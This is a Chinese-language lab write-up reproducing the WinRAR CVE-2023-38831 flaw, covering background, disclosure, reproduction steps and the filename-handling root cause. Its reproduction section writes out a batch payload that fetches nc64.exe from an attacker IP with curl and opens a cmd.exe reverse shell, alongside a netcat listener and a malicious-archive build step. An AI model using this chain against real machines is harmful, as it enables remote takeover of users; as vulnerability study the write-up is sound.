漏洞概况
winRAR介绍
1、常见压缩格式 zip、rar、7z
2、常用压缩软件 WinRAR、Bandizip、7z、360压缩、2345好压
3、发展历史 since 1995
rarlab公司 特性:分卷压缩、支持unicode字符、压缩率高
只有WinRAR软件可以创建rar格式的压缩包,其他软件可以解压
造福无数打工人的WinRAR,为什么活的这么卑微?
https://zhuanlan.zhihu.com/p/639814936
漏洞情况
2023年8月24日 安全公司Group-IB公布漏洞
https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/
影响版本:6.23之前的所有版本
影响级别:千万级
rarlab公司在2023年8月2日发布的6.23版本修补了这一漏洞。
漏洞复现
1、kali启动HTTP服务 在nc64.exe(netcat)目录下: python -m http.server
2、Kali启动端口监听 nc -lnvp 4444 (建立反弹连接)
3、本地POC文件制作 test.png、script.bat,脚本内容 curl http://192.168.14.13:8000/nc64.exe -O nc64.exe & nc64.exe 192.168.14.13 4444 -e cmd.exe -d & test.png python .\make.py test.png script.bat poc.zip
(红色部分以你实际的攻击机IP为准)
script.bat:
通过python脚本构造恶意压缩包:
.\make.py test.png script.bat poc.zip
恶意压缩包构建完成:
4、在WinRAR(<=6.22)中打开POC文件 双击普通文件,漏洞触发(运行script.bat内容、下载nc64.exe、建立反弹连接)
版本信息:
双击打开test.png:
跳出如下界面:
回到攻击机视角,靶机成功上线
漏洞原理
1、当受害者尝试打开存档文件中的"test.png "时, WinRAR会比较存档中的所有文件以查找与"test.png "同 名的文件/目录
2、如果存在与"test.png "同名的目录,WinRAR则会继 续检查"test.png /"目录下的文件
3、如果"test.png /"目录下同样存在文件名为"test.png " 的文件则将"test.png /"目录下"test.png "文件放入提取 列表中
4、最终导致压缩包中的test.png .cmd被解压出来,并且运行
详情请看下篇文章:
https://blog.csdn.net/qq_38924942/article/details/132571600